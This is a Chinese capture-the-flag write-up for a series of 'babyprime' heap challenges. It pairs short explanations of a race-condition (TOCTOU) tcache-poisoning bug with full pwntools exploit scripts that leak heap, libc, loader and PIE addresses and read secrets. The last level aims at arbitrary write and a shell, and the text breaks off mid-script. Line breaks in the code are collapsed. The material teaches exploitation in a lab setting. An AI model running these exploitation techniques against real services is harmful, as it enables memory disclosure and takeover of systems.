前言
盲猜这章是 FSOP 综合利用,但是看到第一题就傻眼了。预知后事如何,请看 wp(
Level 1
Information
- Category: Pwn
Description
Create and use arbitrary read primitives to read from the .bss.
Write-up
本来以为这章顶多就是 Heap + FSOP 综合利用,但是没想到是 Race Conditions + Heap + FSOP……没怎么做过 Race Condition 的我直接人傻了(
但是我又不想为此先去把 Race Conditions 那章做完,那咋办?忍了呗……相信自己的学习能力/自信
敲黑板,像这样详细的 wp 我大概只会写这一次,后面的题就简单说思路,不细写了。
首先是下面这个好像很熟悉实则不然的多线程服务器,不讲了(
不记得的去看我的笔记复习吧~其实我一开始也忘差不多了(bushi

直接跟进到核心函数:
int challenge(){ int result; // eax const char *v1; // rax int v2; // ebx char *s1_1; // rax int v4; // [rsp+2Ch] [rbp-424h] BYREF char s1[1032]; // [rsp+30h] [rbp-420h] BYREF unsigned __int64 v6; // [rsp+438h] [rbp-18h]
v6 = __readfsqword(0x28u); fwrite("Welcome to the message server!\n", 1u, 0x1Fu, (FILE *)__readfsqword(0xFFFFFFF8)); fwrite("Commands: malloc/free/scanf/printf/send_flag/quit.\n", 1u, 0x33u, (FILE *)__readfsqword(0xFFFFFFF8)); while ( 1 ) { result = __isoc99_fscanf(__readfsqword(0xFFFFFFF0), "%1024s", s1); if ( result == -1 ) break; if ( !strcmp(s1, "printf") ) { result = __isoc99_fscanf(__readfsqword(0xFFFFFFF0), "%d", &v4); if ( result == -1 ) return result; v1 = stored[v4] ? (const char *)*((_QWORD *)&messages + v4) : "NONE"; result = fprintf((FILE *)__readfsqword(0xFFFFFFF8), "MESSAGE: %s\n", v1); if ( result < 0 ) return result; } else if ( !strcmp(s1, "malloc") ) { result = __isoc99_fscanf(__readfsqword(0xFFFFFFF0), "%d", &v4); if ( result == -1 ) return result; if ( !stored[v4] ) { v2 = v4; *((_QWORD *)&messages + v2) = malloc(0x400u); } stored[v4] = 1; } else if ( !strcmp(s1, "scanf") ) { result = __isoc99_fscanf(__readfsqword(0xFFFFFFF0), "%d", &v4); if ( result == -1 ) return result; if ( stored[v4] ) s1_1 = (char *)*((_QWORD *)&messages + v4); else s1_1 = s1; __isoc99_fscanf(__readfsqword(0xFFFFFFF0), "%1024s", s1_1); } else if ( !strcmp(s1, "free") ) { result = __isoc99_fscanf(__readfsqword(0xFFFFFFF0), "%d", &v4); if ( result == -1 ) return result; if ( stored[v4] ) free(*((void **)&messages + v4)); stored[v4] = 0; } else if ( !strcmp(s1, "send_flag") ) { fwrite("Secret: ", 1u, 8u, (FILE *)__readfsqword(0xFFFFFFF8)); __isoc99_fscanf(__readfsqword(0xFFFFFFF0), "%1024s", s1); if ( (unsigned __int8)secret_correct(s1) ) { fwrite("Authorized!\n", 1u, 0xCu, (FILE *)__readfsqword(0xFFFFFFF8)); win(); } else { fwrite("Not authorized!\n", 1u, 0x10u, (FILE *)__readfsqword(0xFFFFFFF8)); } } else { result = strcmp(s1, "quit"); if ( !result ) return result; fwrite("Unrecognized choice!\n", 1u, 0x15u, (FILE *)__readfsqword(0xFFFFFFF8)); } } return result;}咋一看还挺安全,没有溢出,没有 UAF,好像无懈可击的鸭子。
内心 OS: wth 第一题就这样恶心我!?那还学个屁,埋了吧(
好吧,稍微用心想想的话,其实还是有很大的问题的……注意,这是一个多线程服务器,允许我们创建无限的连接进行交互,但是程序在操作 stored 全局数组的时候操作并不是 atomic 的,也没有为其加锁,那那那,na 这不就存在一个潜在的 race condition 吗?并且在这种情况下可以归类为 Time-of-Check to Time-of-Use (TOCTOU) 型的条件竞争,因为在每次操作前都检查了 stored 数组然后才执行操作,检查和实际 action 之间有一个 tiny gap 可以被利用。最后,又因为 tcache 不检查 chunk metadata,所以接下来打一个 tcache poisoning 就可以任意读了。
其实我也不是完全不懂 race condition 的 xD,同样,忘记的可以看我笔记。
OK, 讲完了/逃 bro 现在凌晨三点,实在是不想写了,各位师傅还是直接看 exp 吧去感悟吧,反正像这种菜鸟题也没人看(
Exploit
#!/usr/bin/env python3
import argparse
from pwn import ( ELF, context, flat, os, process, raw_input, remote,)
parser = argparse.ArgumentParser()parser.add_argument("-L", action="store_true")parser.add_argument("-T", "--threads", type=int, default=None, help="thread count")args = parser.parse_args()
FILE = "/challenge/babyprime_level1.0"HOST, PORT = "localhost", 1337
context(log_level="debug", binary=FILE, terminal="kitty")
elf = context.binarylibc = elf.libc
def printf(tid, idx): thread[tid].sendline(f"printf {idx}".encode())
def malloc(tid, idx): thread[tid].sendline(f"malloc {idx}".encode())
def scanf(tid, idx, content): thread[tid].sendline(f"scanf {idx} {content}".encode())
def free(tid, idx): thread[tid].sendline(f"free {idx}".encode())
def send_flag(tid, secret): thread[tid].sendline(b"send_flag") thread[tid].sendlineafter(b"Secret: ", secret)
def quit(tid): thread[tid].sendline(b"quit")
def arbitrary_read(addr): while True: thread[0].send((b"malloc 0 free 0\n") * 10000) if os.fork() == 0: thread[1].send((b"scanf 0" + flat(addr) + b"\n") * 10000) os.kill(os.getpid(), 9) os.wait()
malloc(0, 0) printf(0, 0) thread[0].recvuntil(b"MESSAGE: ") poisoned = int.from_bytes(thread[0].recvline().strip(), "little")
if flat(poisoned) == flat(addr): break
malloc(0, 1) printf(0, 1)
thread[0].recvuntil(b"MESSAGE: ") return thread[0].recvline().strip()
def mangle(pos, ptr, shifted=1): if shifted: return pos ^ ptr return (pos >> 12) ^ ptr
def demangle(pos, ptr, shifted=1): if shifted: return mangle(pos, ptr) return mangle(pos, ptr, 0)
def launch(): global target, thread
if args.L and args.threads is not None: raise ValueError("Options -L and -T cannot be used together.")
if args.L: target = process(FILE) elif args.threads: if args.threads <= 0: raise ValueError("Thread count must be positive.") process(FILE)
thread = [remote(HOST, PORT, ssl=False) for _ in range(args.threads)] else: target = remote(HOST, PORT, ssl=True)
def main(): launch()
malloc(0, 0) malloc(0, 1) free(0, 1) free(0, 0) malloc(0, 0) malloc(0, 1)
printf(0, 0) thread[0].recvuntil(b"MESSAGE: ") heap = int.from_bytes(thread[0].recvline().strip(), "little")
printf(0, 1) thread[0].recvuntil(b"MESSAGE: ") pos = int.from_bytes(thread[0].recvline().strip(), "little") heap = demangle(heap, pos)
thread[0].success(f"pos: {hex(pos)}") thread[0].success(f"heap: {hex(heap)}")
malloc(0, 0) malloc(0, 1) free(0, 1) free(0, 0)
raw_input("DEBUG") secret = 0x4054C0 secret = arbitrary_read(mangle(pos - 1, secret))
send_flag(0, secret) quit(0) quit(1)
thread[0].interactive()
if __name__ == "__main__": main()Level 2
Information
- Category: Pwn
Description
Create and use arbitrary read primitives to read from a thread’s heap.
Write-up
太简单不讲。
Exploit
#!/usr/bin/env python3
import argparse
from pwn import ( ELF, context, flat, os, process, raw_input, remote,)
parser = argparse.ArgumentParser()parser.add_argument("-L", action="store_true")parser.add_argument("-T", "--threads", type=int, default=None, help="thread count")args = parser.parse_args()
FILE = "/challenge/babyprime_level2.0"HOST, PORT = "localhost", 1337
context(log_level="debug", binary=FILE, terminal="kitty")
elf = context.binarylibc = elf.libc
def printf(tid, idx): thread[tid].sendline(f"printf {idx}".encode())
def malloc(tid, idx): thread[tid].sendline(f"malloc {idx}".encode())
def scanf(tid, idx, content): thread[tid].sendline(f"scanf {idx} {content}".encode())
def free(tid, idx): thread[tid].sendline(f"free {idx}".encode())
def send_flag(tid, secret): thread[tid].sendline(b"send_flag") thread[tid].sendlineafter(b"Secret: ", secret)
def quit(tid): thread[tid].sendline(b"quit")
def arbitrary_read(addr): while True: thread[0].send((b"malloc 0 free 0\n") * 10000) if os.fork() == 0: thread[1].send((b"scanf 0" + flat(addr) + b"\n") * 10000) os.kill(os.getpid(), 9) os.wait()
malloc(0, 0) printf(0, 0) thread[0].recvuntil(b"MESSAGE: ") poisoned = int.from_bytes(thread[0].recvline().strip(), "little")
if flat(poisoned) == flat(addr): break
malloc(0, 1) printf(0, 1)
thread[0].recvuntil(b"MESSAGE: ") return thread[0].recvline().strip()
def mangle(pos, ptr, shifted=1): if shifted: return pos ^ ptr return (pos >> 12) ^ ptr
def demangle(pos, ptr, shifted=1): if shifted: return mangle(pos, ptr) return mangle(pos, ptr, 0)
def launch(): global target, thread
if args.L and args.threads is not None: raise ValueError("Options -L and -T cannot be used together.")
if args.L: target = process(FILE) elif args.threads: if args.threads <= 0: raise ValueError("Thread count must be positive.") process(FILE)
thread = [remote(HOST, PORT, ssl=False) for _ in range(args.threads)] else: target = remote(HOST, PORT, ssl=True)
def main(): launch()
malloc(0, 0) malloc(0, 1) free(0, 1) free(0, 0) malloc(0, 0) malloc(0, 1)
printf(0, 0) thread[0].recvuntil(b"MESSAGE: ") heap = int.from_bytes(thread[0].recvline().strip(), "little")
printf(0, 1) thread[0].recvuntil(b"MESSAGE: ") pos = int.from_bytes(thread[0].recvline().strip(), "little") heap = demangle(heap, pos)
thread[0].success(f"pos: {hex(pos)}") thread[0].success(f"heap: {hex(heap)}")
malloc(0, 0) malloc(0, 1) free(0, 1) free(0, 0)
raw_input("DEBUG") secret = heap - 0x431 secret = arbitrary_read(mangle(pos - 1, secret)) thread[0].success(secret)
send_flag(0, secret) quit(0) quit(1)
thread[0].interactive()
if __name__ == "__main__": main()Level 3
Information
- Category: Pwn
Description
Create and use arbitrary read primitives to read from a thread’s stack.
Write-up
这次分配到线程栈上去了,线程栈和 libc 有固定偏移,所以弄到 libc 就知道栈地址了。
Exploit
#!/usr/bin/env python3
import argparse
from pwn import ( ELF, context, flat, os, process, raw_input, remote,)
parser = argparse.ArgumentParser()parser.add_argument("-L", action="store_true")parser.add_argument("-T", "--threads", type=int, default=None, help="thread count")args = parser.parse_args()
FILE = "/challenge/babyprime_level3.0"HOST, PORT = "localhost", 1337
context(log_level="debug", binary=FILE, terminal="kitty")
elf = context.binarylibc = elf.libc
def printf(tid, idx): thread[tid].sendline(f"printf {idx}".encode())
def malloc(tid, idx): thread[tid].sendline(f"malloc {idx}".encode())
def scanf(tid, idx, content): thread[tid].sendline(f"scanf {idx} {content}".encode())
def free(tid, idx): thread[tid].sendline(f"free {idx}".encode())
def send_flag(tid, secret): thread[tid].sendline(b"send_flag") thread[tid].sendlineafter(b"Secret: ", secret)
def quit(tid): thread[tid].sendline(b"quit")
def arbitrary_read(poison_idx, result_idx, addr): while True: thread[0].send((f"malloc {poison_idx} free {poison_idx}\n".encode()) * 10000) if os.fork() == 0: thread[1].send( (f"scanf {poison_idx}".encode() + flat(addr) + b"\n") * 10000 ) os.kill(os.getpid(), 9) os.wait()
malloc(0, poison_idx) printf(0, poison_idx) thread[0].recvuntil(b"MESSAGE: ") poisoned = int.from_bytes(thread[0].recvline().strip(), "little")
if flat(poisoned) == flat(addr): break
malloc(0, result_idx) raw_input("DEBUG") printf(0, result_idx)
thread[0].recvuntil(b"MESSAGE: ") return thread[0].recvline().strip()
def mangle(pos, ptr, shifted=1): if shifted: return pos ^ ptr return (pos >> 12) ^ ptr
def demangle(pos, ptr, shifted=1): if shifted: return mangle(pos, ptr) return mangle(pos, ptr, 0)
def launch(): global target, thread
if args.L and args.threads is not None: raise ValueError("Options -L and -T cannot be used together.")
if args.L: target = process(FILE) elif args.threads: if args.threads <= 0: raise ValueError("Thread count must be positive.") process(FILE)
thread = [remote(HOST, PORT, ssl=False) for _ in range(args.threads)] else: target = remote(HOST, PORT, ssl=True)
def main(): launch()
malloc(0, 0) malloc(0, 1) free(0, 1) free(0, 0) malloc(0, 0) malloc(0, 1)
printf(0, 0) thread[0].recvuntil(b"MESSAGE: ") heap = int.from_bytes(thread[0].recvline().strip(), "little")
printf(0, 1) thread[0].recvuntil(b"MESSAGE: ") pos = int.from_bytes(thread[0].recvline().strip(), "little") heap = demangle(heap, pos) main_arena_ptr = heap - 0xAA1
thread[0].success(f"pos: {hex(pos)}") thread[0].success(f"heap: {hex(heap)}") thread[0].success(f"main_arena_ptr: {hex(main_arena_ptr)}")
malloc(0, 0) malloc(0, 1) free(0, 1) free(0, 0)
libc.address = ( int.from_bytes(arbitrary_read(0, 1, mangle(pos - 1, main_arena_ptr)), "little") - 0x219C80 ) secret = libc.address - 0x4740
thread[0].success(f"libc: {hex(libc.address)}") thread[0].success(f"secret: {hex(secret)}")
malloc(0, 2) malloc(0, 4) free(0, 4) free(0, 2)
raw_input("DEBUG") secret = arbitrary_read(2, 4, mangle(pos, secret))
send_flag(0, secret) quit(0) quit(1)
thread[0].interactive()
if __name__ == "__main__": main()Level 4
Information
- Category: Pwn
Description
Create and use arbitrary read primitives to read from the .bss, now with PIE.
Write-up
注意权限问题,p2p 是你的好朋友。好啦,尽情去寻找虚拟内存地址空间中那块属于你的,闪闪发光的垃圾吧~
Exploit
#!/usr/bin/env python3
import argparse
from pwn import ( ELF, context, flat, os, process, raw_input, remote,)
parser = argparse.ArgumentParser()parser.add_argument("-L", action="store_true")parser.add_argument("-T", "--threads", type=int, default=None, help="thread count")args = parser.parse_args()
FILE = "/challenge/babyprime_level4.0"HOST, PORT = "localhost", 1337
context(log_level="debug", binary=FILE, terminal="kitty")
elf = context.binarylibc = elf.libc
def printf(tid, idx): thread[tid].sendline(f"printf {idx}".encode())
def malloc(tid, idx): thread[tid].sendline(f"malloc {idx}".encode())
def scanf(tid, idx, content): thread[tid].sendline(f"scanf {idx} {content}".encode())
def free(tid, idx): thread[tid].sendline(f"free {idx}".encode())
def send_flag(tid, secret): thread[tid].sendline(b"send_flag") thread[tid].sendlineafter(b"Secret: ", secret)
def quit(tid): thread[tid].sendline(b"quit")
def arbitrary_read(poison_idx, result_idx, addr): BAD_BYTES = {b"\x20", b"\x0c", b"\x0a", b"\x0d", b"\x09", b"\x0b"}
packed_addr = flat(addr) if any(bytes([byte]) in BAD_BYTES for byte in packed_addr): raise ValueError( f"Address {hex(addr)} contains a bad byte for scanf: {packed_addr.hex()}" )
while True: thread[0].send((f"malloc {poison_idx} free {poison_idx}\n".encode()) * 10000) if os.fork() == 0: thread[1].send( (f"scanf {poison_idx}".encode() + flat(addr) + b"\n") * 10000 ) os.kill(os.getpid(), 9) os.wait()
malloc(0, poison_idx) printf(0, poison_idx) thread[0].recvuntil(b"MESSAGE: ") poisoned = int.from_bytes(thread[0].recvline().strip(), "little")
if flat(poisoned) == packed_addr: break
raw_input("DEBUG") malloc(0, result_idx) printf(0, result_idx)
thread[0].recvuntil(b"MESSAGE: ") return thread[0].recvline().strip()
def mangle(pos, ptr, shifted=1): if shifted: return pos ^ ptr return (pos >> 12) ^ ptr
def demangle(pos, ptr, shifted=1): if shifted: return mangle(pos, ptr) return mangle(pos, ptr, 0)
def launch(): global target, thread
if args.L and args.threads is not None: raise ValueError("Options -L and -T cannot be used together.")
if args.L: target = process(FILE) elif args.threads: if args.threads <= 0: raise ValueError("Thread count must be positive.") process(FILE)
thread = [remote(HOST, PORT, ssl=False) for _ in range(args.threads)] else: target = remote(HOST, PORT, ssl=True)
def main(): launch()
malloc(0, 0) malloc(0, 1) free(0, 1) free(0, 0) malloc(0, 0) malloc(0, 1)
printf(0, 0) thread[0].recvuntil(b"MESSAGE: ") heap = int.from_bytes(thread[0].recvline().strip(), "little")
printf(0, 1) thread[0].recvuntil(b"MESSAGE: ") pos = int.from_bytes(thread[0].recvline().strip(), "little") heap = demangle(heap, pos) main_arena_ptr = heap - 0xAA1
thread[0].success(f"pos: {hex(pos)}") thread[0].success(f"heap: {hex(heap)}") thread[0].success(f"main_arena_ptr: {hex(main_arena_ptr)}")
raw_input("DEBUG") malloc(0, 0) malloc(0, 1) free(0, 1) free(0, 0)
libc.address = ( int.from_bytes(arbitrary_read(0, 1, mangle(pos - 1, main_arena_ptr)), "little") - 0x219C80 ) ld_ptr = libc.address + 0x219010
thread[0].success(f"libc: {hex(libc.address)}") thread[0].success(f"ld_ptr: {hex(ld_ptr)}")
raw_input("DEBUG") malloc(0, 2) malloc(0, 4) free(0, 4) free(0, 2)
ld = int.from_bytes(arbitrary_read(2, 4, mangle(pos, ld_ptr)), "little") - 0x15C60 pie_ptr = ld + 0x3B2F0
thread[0].success(f"ld: {hex(ld)}") thread[0].success(f"pie_ptr: {hex(pie_ptr)}")
raw_input("DEBUG") malloc(0, 3) malloc(0, 5) free(0, 5) free(0, 3)
elf.address = ( int.from_bytes(arbitrary_read(3, 5, mangle(pos, pie_ptr)), "little") - 0x4CA8 ) secret_ptr = elf.address + 0x53C0
thread[0].success(f"pie: {hex(elf.address)}") thread[0].success(f"secret: {hex(secret_ptr)}")
raw_input("DEBUG") malloc(0, 6) malloc(0, 7) free(0, 7) free(0, 6)
secret = arbitrary_read(6, 7, mangle(pos, secret_ptr + 0x3))
send_flag(0, secret) quit(0) quit(1)
thread[0].interactive()
if __name__ == "__main__": main()Level 5
Information
- Category: Pwn
Description
Create and use arbitrary read primitives to read from the environment.
Write-up
探索探索内存,探探探就出来了。
Exploit
#!/usr/bin/env python3
import argparse
from pwn import ( ELF, context, flat, os, process, raw_input, remote,)
parser = argparse.ArgumentParser()parser.add_argument("-L", action="store_true")parser.add_argument("-T", "--threads", type=int, default=None, help="thread count")args = parser.parse_args()
FILE = "/challenge/babyprime_level5.0"HOST, PORT = "localhost", 1337
context(log_level="debug", binary=FILE, terminal="kitty")
elf = context.binarylibc = elf.libc
def printf(tid, idx): thread[tid].sendline(f"printf {idx}".encode())
def malloc(tid, idx): thread[tid].sendline(f"malloc {idx}".encode())
def scanf(tid, idx, content): thread[tid].sendline(f"scanf {idx} {content}".encode())
def free(tid, idx): thread[tid].sendline(f"free {idx}".encode())
def send_flag(tid, secret): thread[tid].sendline(b"send_flag") thread[tid].sendlineafter(b"Secret: ", secret)
def quit(tid): thread[tid].sendline(b"quit")
def arbitrary_read(poison_idx, result_idx, addr): BAD_BYTES = {b"\x20", b"\x0c", b"\x0a", b"\x0d", b"\x09", b"\x0b"}
packed_addr = flat(addr) if any(bytes([byte]) in BAD_BYTES for byte in packed_addr): raise ValueError( f"Address {hex(addr)} contains a bad byte for scanf: {packed_addr.hex()}" )
while True: thread[0].send((f"malloc {poison_idx} free {poison_idx}\n".encode()) * 10000) if os.fork() == 0: thread[1].send( (f"scanf {poison_idx}".encode() + flat(addr) + b"\n") * 10000 ) os.kill(os.getpid(), 9) os.wait()
malloc(0, poison_idx) printf(0, poison_idx) thread[0].recvuntil(b"MESSAGE: ") poisoned = int.from_bytes(thread[0].recvline().strip(), "little")
if flat(poisoned) == packed_addr: break
raw_input("DEBUG") malloc(0, result_idx) printf(0, result_idx)
def mangle(pos, ptr, shifted=1): if shifted: return pos ^ ptr return (pos >> 12) ^ ptr
def demangle(pos, ptr, shifted=1): if shifted: return mangle(pos, ptr) return mangle(pos, ptr, 0)
def launch(): global target, thread
if args.L and args.threads is not None: raise ValueError("Options -L and -T cannot be used together.")
if args.L: target = process(FILE) elif args.threads: if args.threads <= 0: raise ValueError("Thread count must be positive.") process(FILE)
thread = [remote(HOST, PORT, ssl=False) for _ in range(args.threads)] else: target = remote(HOST, PORT, ssl=True)
def main(): launch()
malloc(0, 0) malloc(0, 1) free(0, 1) free(0, 0) malloc(0, 0) malloc(0, 1)
printf(0, 0) thread[0].recvuntil(b"MESSAGE: ") heap = int.from_bytes(thread[0].recvline().strip(), "little")
printf(0, 1) thread[0].recvuntil(b"MESSAGE: ") pos = int.from_bytes(thread[0].recvline().strip(), "little") heap = demangle(heap, pos) main_arena_ptr = heap - 0xAA1
thread[0].success(f"pos: {hex(pos)}") thread[0].success(f"heap: {hex(heap)}") thread[0].success(f"main_arena_ptr: {hex(main_arena_ptr)}")
raw_input("DEBUG") malloc(0, 0) malloc(0, 1) free(0, 1) free(0, 0)
arbitrary_read(0, 1, mangle(pos - 1, main_arena_ptr)) thread[0].recvuntil(b"MESSAGE: ") libc.address = int.from_bytes(thread[0].recvline().strip(), "little") - 0x219C80 known_values = libc.address + 0x21AEC0
thread[0].success(f"libc: {hex(libc.address)}") thread[0].success(f"known_values: {hex(known_values)}")
raw_input("DEBUG") malloc(0, 2) malloc(0, 4) free(0, 4) free(0, 2)
arbitrary_read(2, 4, mangle(pos, known_values)) thread[0].recvuntil(b"MESSAGE: ") secret = int.from_bytes(thread[0].recv(0x6), "little") - 0x30
thread[0].success(f"secret: {hex(secret)}")
raw_input("DEBUG") malloc(0, 3) malloc(0, 5) free(0, 5) free(0, 3)
arbitrary_read(3, 5, mangle(pos, secret + 0x10)) thread[0].recvuntil(b"MESSAGE: ") secret = thread[0].recvline().strip()
thread[0].success(f"secret: {secret}")
send_flag(0, secret) quit(0) quit(1)
thread[0].interactive()
if __name__ == "__main__": main()Level 6
Information
- Category: Pwn
Description
Create and use arbitrary read primitives to read from the main heap.
Write-up
培养内存侦查大头兵 ing……
Exploit
#!/usr/bin/env python3
import argparse
from pwn import ( ELF, context, flat, os, process, raw_input, remote,)
parser = argparse.ArgumentParser()parser.add_argument("-L", action="store_true")parser.add_argument("-T", "--threads", type=int, default=None, help="thread count")args = parser.parse_args()
FILE = "/challenge/babyprime_level6.0"HOST, PORT = "localhost", 1337
context(log_level="debug", binary=FILE, terminal="kitty")
elf = context.binarylibc = elf.libc
def printf(tid, idx): thread[tid].sendline(f"printf {idx}".encode())
def malloc(tid, idx): thread[tid].sendline(f"malloc {idx}".encode())
def scanf(tid, idx, content): thread[tid].sendline(f"scanf {idx} {content}".encode())
def free(tid, idx): thread[tid].sendline(f"free {idx}".encode())
def send_flag(tid, secret): thread[tid].sendline(b"send_flag") thread[tid].sendlineafter(b"Secret: ", secret)
def quit(tid): thread[tid].sendline(b"quit")
def arbitrary_read(poison_idx, result_idx, addr): BAD_BYTES = {b"\x20", b"\x0c", b"\x0a", b"\x0d", b"\x09", b"\x0b"}
packed_addr = flat(addr) if any(bytes([byte]) in BAD_BYTES for byte in packed_addr): raise ValueError( f"Address {hex(addr)} contains a bad byte for scanf: {packed_addr.hex()}" )
while True: thread[0].send((f"malloc {poison_idx} free {poison_idx}\n".encode()) * 10000) if os.fork() == 0: thread[1].send( (f"scanf {poison_idx}".encode() + flat(addr) + b"\n") * 10000 ) os.kill(os.getpid(), 9) os.wait()
malloc(0, poison_idx) printf(0, poison_idx) thread[0].recvuntil(b"MESSAGE: ") poisoned = int.from_bytes(thread[0].recvline().strip(), "little")
if flat(poisoned) == packed_addr: break
raw_input("DEBUG") malloc(0, result_idx) printf(0, result_idx)
def mangle(pos, ptr, shifted=1): if shifted: return pos ^ ptr return (pos >> 12) ^ ptr
def demangle(pos, ptr, shifted=1): if shifted: return mangle(pos, ptr) return mangle(pos, ptr, 0)
def launch(): global target, thread
if args.L and args.threads is not None: raise ValueError("Options -L and -T cannot be used together.")
if args.L: target = process(FILE) elif args.threads: if args.threads <= 0: raise ValueError("Thread count must be positive.") process(FILE)
thread = [remote(HOST, PORT, ssl=False) for _ in range(args.threads)] else: target = remote(HOST, PORT, ssl=True)
def main(): launch()
malloc(0, 0) malloc(0, 1) free(0, 1) free(0, 0) malloc(0, 0) malloc(0, 1)
printf(0, 0) thread[0].recvuntil(b"MESSAGE: ") heap = int.from_bytes(thread[0].recvline().strip(), "little")
printf(0, 1) thread[0].recvuntil(b"MESSAGE: ") pos = int.from_bytes(thread[0].recvline().strip(), "little") heap = demangle(heap, pos) main_arena_ptr = heap - 0xAA1
thread[0].success(f"pos: {hex(pos)}") thread[0].success(f"heap: {hex(heap)}") thread[0].success(f"main_arena_ptr: {hex(main_arena_ptr)}")
raw_input("DEBUG") malloc(0, 0) malloc(0, 1) free(0, 1) free(0, 0)
arbitrary_read(0, 1, mangle(pos - 1, main_arena_ptr)) thread[0].recvuntil(b"MESSAGE: ") libc.address = int.from_bytes(thread[0].recvline().strip(), "little") - 0x219C80 heap_ptr = libc.address + 0x219CE0
thread[0].success(f"libc: {hex(libc.address)}") thread[0].success(f"heap_ptr: {hex(heap_ptr)}")
raw_input("DEBUG") malloc(0, 2) malloc(0, 4) free(0, 4) free(0, 2)
arbitrary_read(2, 4, mangle(pos, heap_ptr)) thread[0].recvuntil(b"MESSAGE: ") heap = int.from_bytes(thread[0].recvline().strip(), "little") secret = heap - 0x2B0
thread[0].success(f"heap: {hex(heap)}") thread[0].success(f"secret: {hex(secret)}")
raw_input("DEBUG") malloc(0, 3) malloc(0, 5) free(0, 5) free(0, 3)
arbitrary_read(3, 5, mangle(pos, secret)) thread[0].recvuntil(b"MESSAGE: ") secret = thread[0].recvline().strip()
thread[0].success(f"secret: {secret}")
send_flag(0, secret) quit(0) quit(1)
thread[0].interactive()
if __name__ == "__main__": main()Level 7
Information
- Category: Pwn
Description
Create and use arbitrary read/write primitives to obtain the flag.
Write-up
一开始被这个 flag_seed 函数迷惑了:
unsigned __int64 flag_seed(){ unsigned int seed; // [rsp+4h] [rbp-9Ch] unsigned int i; // [rsp+8h] [rbp-98h] int fd; // [rsp+Ch] [rbp-94h] _QWORD buf[17]; // [rsp+10h] [rbp-90h] BYREF unsigned __int64 v5; // [rsp+98h] [rbp-8h]
v5 = __readfsqword(0x28u); memset(buf, 0, 128); fd = open("/flag", 0); if ( fd < 0 ) __assert_fail("fd >= 0", "/mnt/pwnshop/source.c", 0x2Bu, "flag_seed"); if ( read(fd, buf, 0x80u) <= 0 ) __assert_fail("read(fd, flag, 128) > 0", "/mnt/pwnshop/source.c", 0x2Cu, "flag_seed"); seed = 0; for ( i = 0; i <= 0x1F; ++i ) seed ^= *((_DWORD *)buf + (int)i); srand(seed); memset(buf, 0, 0x80u); return v5 - __readfsqword(0x28u);}注意到 open flag 之后并没有 close 那个 fd,并且下面那个 memset 清空了内存中的 flag,导致我的第一反应是想办法把 flag 读回内存……但又对 open 这种直接返回 file descriptor 的函数感到迷惑,不晓得如何将 flag 读出来……
后来问 AI,了解了 _IO_underflow 好像可以读文件,然后去改线程的 stdin,然并软。
我居然在最后浪费了差不多一天后才想到,我还可以尝试 getshell 啊,草!最后发现,one gadget 是正确执行了,但是没回显啊……再问 AI,得知 execve 会杀掉原进程的所有其它线程,当前执行 execve 的这个线程变成新进程的 main thread,并且只会继承 process-level 的资源,比如 fd table、cwd、environ、credentials 等,不会继承任何 thread-level 的东西。哦~这不就是 CSAPP fork 那课讲的吗,不好意思,记性不好(bushi
所以解决方法也很简单,直接 dup2 重定向一下 stdin 和 stdout 就好了。由于我们要 shell,所以 stderr 没啥用,况且子进程本来也没设置 stderr,直接忽视。
Exploit
#!/usr/bin/env python3
import argparse
from pwn import ( ELF, FileStructure, constants, context, flat, os, process, raw_input, remote,)
parser = argparse.ArgumentParser()parser.add_argument("-L", action="store_true")parser.add_argument("-T", "--threads", type=int, default=None, help="thread count")args = parser.parse_args()
FILE = "/challenge/babyprime_level7.0"HOST, PORT = "localhost", 1337
context(log_level="debug", binary=FILE, terminal="kitty")
elf = context.binarylibc = elf.libc
def printf(tid, idx): thread[tid].sendline(f"printf {idx}".encode())
def malloc(tid, idx): thread[tid].sendline(f"malloc {idx}".encode())
def scanf(tid, idx, content): thread[tid].sendline(f"scanf {idx} {content}".encode())
def scanf_raw(tid, idx, content): thread[tid].sendline(f"scanf {idx} ".encode() + content)
def free(tid, idx): thread[tid].sendline(f"free {idx}".encode())
def quit(tid): thread[tid].sendline(b"quit")
def arbitrary_read(poison_idx, result_idx, addr): BAD_BYTES = {b"\x20", b"\x0c", b"\x0a", b"\x0d", b"\x09", b"\x0b"}
packed_addr = flat(addr) if any(bytes([byte]) in BAD_BYTES for byte in packed_addr): raise ValueError( f"Address {hex(addr)} contains a bad byte for scanf: {packed_addr.hex()}" )
while True: thread[0].send((f"malloc {poison_idx} free {poison_idx}\n".encode()) * 10000) if os.fork() == 0: thread[1].send( (f"scanf {poison_idx}".encode() + packed_addr + b"\n") * 10000 ) os.kill(os.getpid(), 9) os.wait()
malloc(0, poison_idx) printf(0, poison_idx) thread[0].recvuntil(b"MESSAGE: ") poisoned = int.from_bytes(thread[0].recvline().strip(), "little")
if flat(poisoned) == packed_addr: break
raw_input("DEBUG") malloc(0, result_idx) printf(0, result_idx)
def arbitrary_write(poison_idx, result_idx, addr, content): arbitrary_read(poison_idx, result_idx, addr) raw_input("RAW SCANF") scanf_raw(0, result_idx, content)
def mangle(pos, ptr, shifted=1): if shifted: return pos ^ ptr return (pos >> 12) ^ ptr
def demangle(pos, ptr, shifted=1): if shifted: return mangle(pos, ptr) return mangle(pos, ptr, 0)
def launch(): global target, thread
if args.L and args.threads is not None: raise ValueError("Options -L and -T cannot be used together.")
if args.L: target = process(FILE) elif args.threads: if args.threads <= 0: raise ValueError("Thread count must be positive.") process(FILE)
thread = [remote(HOST, PORT, ssl=False) for _ in range(args.threads)] else: target = remote(HOST, PORT, ssl=True)
def main(): launch()
malloc(0, 0) malloc(0, 1) free(0, 1) free(0, 0) malloc(0, 0) malloc(0, 1)
printf(0, 0) thread[0].recvuntil(b"MESSAGE: ") heap = int.from_bytes(thread[0].recvline().strip(), "little")
printf(0, 1) thread[0].recvuntil(b"MESSAGE: ") pos = int.from_bytes(thread[0].recvline().strip(), "little") heap = demangle(heap, pos) main_arena_ptr = heap - 0xAA1 thread_stdout = heap - 0x5F1
thread[0].success(f"pos: {hex(pos)}") thread[0].success(f"heap: {hex(heap)}") thread[0].success(f"main_arena_ptr: {hex(main_arena_ptr)}") thread[0].success(f"thread_stdout: {hex(thread_stdout)}")
raw_input("DEBUG") malloc(0, 0) malloc(0, 1) free(0, 1) free(0, 0)
arbitrary_read(0, 1, mangle(pos - 1, main_arena_ptr)) thread[0].recvuntil(b"MESSAGE: ") libc.address = int.from_bytes(thread[0].recvline().strip(), "little") - 0x219C80 heap_ptr = libc.address + 0x219CE0 __GI__IO_wfile_overflow = libc.address + 0x215FE0
